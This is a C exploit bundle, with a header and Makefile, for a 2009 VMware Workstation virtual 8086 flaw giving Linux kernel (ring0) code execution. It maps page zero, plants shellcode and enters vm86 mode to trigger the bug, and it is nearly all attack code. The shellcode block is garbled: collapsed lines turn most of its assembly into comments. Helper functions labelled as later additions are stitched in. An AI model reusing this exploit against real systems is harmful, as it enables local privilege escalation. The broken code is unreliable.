----------------------------------------vmware86.c----------------------------------------
//
// -----------------------------------
// VMWare Workstation Virtual 8086 Linux Local ring0
// --------------------------- taviso@sdf.lonestar.org, julien@cr0.org -----
//
// Tavis Ormandy and Julien Tinnes, June 2009
//
//
#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/vm86.h>
#include <asm/unistd.h>
#include "vm86util.h"
static bool InitialiseVirtual8086();
static bool InstallShellCode();
static bool EnterVirtual8086();
static bool MapPageAtNull();
int main(int argc, char **argv)
{
    // Get a page mapped at NULL
    if (MapPageAtNull()) {
        fprintf(stderr, "mmap() failed: %m\n");
        return 1;
    }

    // Setup the Virtual 8086 address space
    InitialiseVirtual8086();

    // Install the shellcode that executes once we've gained control of the kernel
    InstallShellCode();

    // Trigger the VMWare Vulnerability
    EnterVirtual8086();

    // Not Reached
    abort();
}
// Returns true if the mapping failed, matching the error check in main().
static bool MapPageAtNull()
{
    return mmap(NULL,
                PAGE_SIZE,
                PROT_NONE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                0,
                0) == MAP_FAILED;
}
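// Optional sanity check, not part of the original exploit: unprivileged
// processes can normally only map page zero when vm.mmap_min_addr permits
// it, so a warning here can explain an otherwise silent mmap() failure.
// The helper name is our own; call it from main() before MapPageAtNull()
// if desired.
static void WarnIfLowMappingsForbidden()
{
    unsigned long minaddr = 0;
    FILE *proc = fopen("/proc/sys/vm/mmap_min_addr", "r");

    if (proc == NULL)
        return;

    if (fscanf(proc, "%lu", &minaddr) == 1 && minaddr != 0)
        fprintf(stderr, "warning: vm.mmap_min_addr is %lu, mapping page zero may fail\n",
                minaddr);

    fclose(proc);
}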
static char   Message[1024];
static size_t MessageSize;

static bool InstallShellCode()
{
    uint8_t  *code;
    uint32_t  codesize;

    // Message to print from ring0
    MessageSize = snprintf(Message, sizeof(Message), "<script>alert('ring0')</script>\n");
CODE32("mov esp, edi \n" // Restore a usable stack "sub esp, 0x50 \n" // Fixup stack pointer
// Print message "mov edx, MessageSize \n" // len "lea ecx, Message \n" // buf "mov ebx, " SYM(STDOUT_FILENO) " \n" // fd "mov eax, " SYM(__NR_write) " \n" "int 0x80 \n" // write(STDOUT_FILENO, Message, sizeof(Message));
// Now kill this process "mov eax, " SYM(__NR_getpid) " \n" "int 0x80 \n" // getpid() "mov ebx, eax \n" // pid "mov ecx, " SYM(SIGKILL) " \n" // signal "mov eax, " SYM(__NR_kill) " \n" "int 0x80 \n", // kill(getpid(), SIGKILL); code, codesize);
    // Install it to the pnp bios jmp location
    memcpy(REAL(0x0000, 0x0000), code, codesize);

    return true;
}
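// Optional debugging aid, not part of the original exploit: hex-dump the
// bytes just installed so the generated shellcode can be inspected with a
// disassembler before triggering the bug. The helper name is our own.
static void DumpInstalledCode(const uint8_t *code, uint32_t codesize)
{
    uint32_t i;

    for (i = 0; i < codesize; i++)
        fprintf(stderr, "%02x%c", code[i], (i % 16 == 15) ? '\n' : ' ');

    fputc('\n', stderr);
}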
static bool EnterVirtual8086()
{
    uint8_t  *code;
    uint32_t  codesize;
    vm86_t    vm = {0};

    // Setup cpu type
    vm.cpu_type = CPU_586;

    // Setup registers
    vm.regs.eflags = EFLAGS_TF_MASK;
    vm.regs.esp    = 0xDEADBEEF;
    vm.regs.eip    = 0x00000000;
    vm.regs.cs     = 0x0090;
    vm.regs.ss     = 0xFFFF;
CODE16("call 0xaabb:0xccdd", code, codesize);
memcpy(REAL(vm.regs.cs, vm.regs.eip), code, codesize);
vm86(Vm86Enter, &vm);
return false; }
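// The vm86() call above relies on the wrapper glibc declares in <sys/vm86.h>.
// As an assumption-labelled fallback (not part of the original code), a raw
// system call along these lines should behave the same on i386 if the
// wrapper is unavailable; the helper name is our own.
static int Vm86Raw(unsigned long fn, vm86_t *info)
{
    return syscall(__NR_vm86, fn, info);
}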
static bool InitialiseVirtual8086()
{
    // Make the MMAP_PAGE_ZERO page rwx
    if (mprotect(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        return false;
    }

    // Stretch the page to 1MB for the entire real mode address space
    // (no MREMAP_MAYMOVE, so the mapping has to grow in place at address zero)
    if (mremap(NULL, PAGE_SIZE, 1024 * 1024, 0) == MAP_FAILED) {
        return false;
    }

    // All done
    return true;
}
---------------------------------vm86util.h-----------------------------------------
#ifndef __VM86UTIL_H
#define SYM(s) STR(s)
#define STR(s) #s
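// e.g. SYM(SIGKILL) expands (after macro expansion) to the string "9",
// ready to be spliced into the inline assembly templates in vmware86.c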
typedef enum {
    Vm86PlusInstallCheck,
    Vm86Enter,
    Vm86EnterNoBypass,
    Vm86RequestIrq,
    Vm86FreeIrq,
    Vm86GetIrqBits,
    Vm86GetAndResetIrq,
} vm86func_t;
typedef struct vm86_regs       vm86regs_t;
typedef struct vm86plus_struct vm86_t;
// Calculate a linear address from CS:IP pair
#define REAL(cs,ip) ((void *)(((cs) << 4) + ((ip) & 0xffff)))
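// e.g. REAL(0x0090, 0x0000) is the linear address 0x00000900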
#define EFLAGS_CF_MASK   0x00000001     // carry flag
#define EFLAGS_PF_MASK   0x00000004     // parity flag
#define EFLAGS_AF_MASK   0x00000010     // auxiliary carry flag
#define EFLAGS_ZF_MASK   0x00000040     // zero flag
#define EFLAGS_SF_MASK   0x00000080     // sign flag
#define EFLAGS_TF_MASK   0x00000100     // trap flag
#define EFLAGS_IF_MASK   0x00000200     // interrupt flag
#define EFLAGS_DF_MASK   0x00000400     // direction flag
#define EFLAGS_OF_MASK   0x00000800     // overflow flag
#define EFLAGS_IOPL_MASK 0x00003000     // I/O privilege level
#define EFLAGS_NT_MASK   0x00004000     // nested task
#define EFLAGS_RF_MASK   0x00010000     // resume flag
#define EFLAGS_VM_MASK   0x00020000     // virtual 8086 mode
#define EFLAGS_AC_MASK   0x00040000     // alignment check
#define EFLAGS_VIF_MASK  0x00080000     // virtual interrupt flag
#define EFLAGS_VIP_MASK  0x00100000     // virtual interrupt pending
#define EFLAGS_ID_MASK   0x00200000     // identification flag
#ifdef __OPTIMIZE__
# error The CODE16() and CODE32() macros might be eliminated as dead code with optimization enabled.
#endif
// Generate 16bit code inline
#define CODE16(code, label, size) do {                                  \
        __label__ c16start, c16end;                                     \
        volatile uint8_t *end = &&c16end;                               \
        /* Jump over the emitted bytes so they are never executed here */\
        goto *end; c16start:                                            \
        asm volatile (".intel_syntax noprefix\n"                        \
                      ".code16\n"                                       \
                      code "\n"                                         \
                      ".code32\n"                                       \
                      ".att_syntax prefix\n");                          \
        c16end:                                                         \
        /* The labels bracket the generated code: return start and size */\
        (label) = &&c16start;                                           \
        (size)  = end - (label);                                        \
} while (false)
// Generate 32bit code inline
#define CODE32(code, label, size) do {                                  \
        __label__ c32start, c32end;                                     \
        volatile uint8_t *end = &&c32end;                               \
        goto *end; c32start:                                            \
        asm volatile (".intel_syntax noprefix\n"                        \
                      code "\n"                                         \
                      ".att_syntax prefix\n");                          \
        c32end:                                                         \
        (label) = &&c32start;                                           \
        (size)  = end - (label);                                        \
} while (false)
#define __VM86UTIL_H
#else
# warning vm86util.h included twice
#endif
------------------------------Makefile-----------------------------
all: vmware86
clean:
	rm -f vmware86 *.o *.core core

vmware86: vmware86.c
	gcc -m32 $< -o $@
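# Note: the -m32 build assumes an i386-capable toolchain with 32-bit libc
# headers installed (e.g. gcc-multilib on 64-bit hosts).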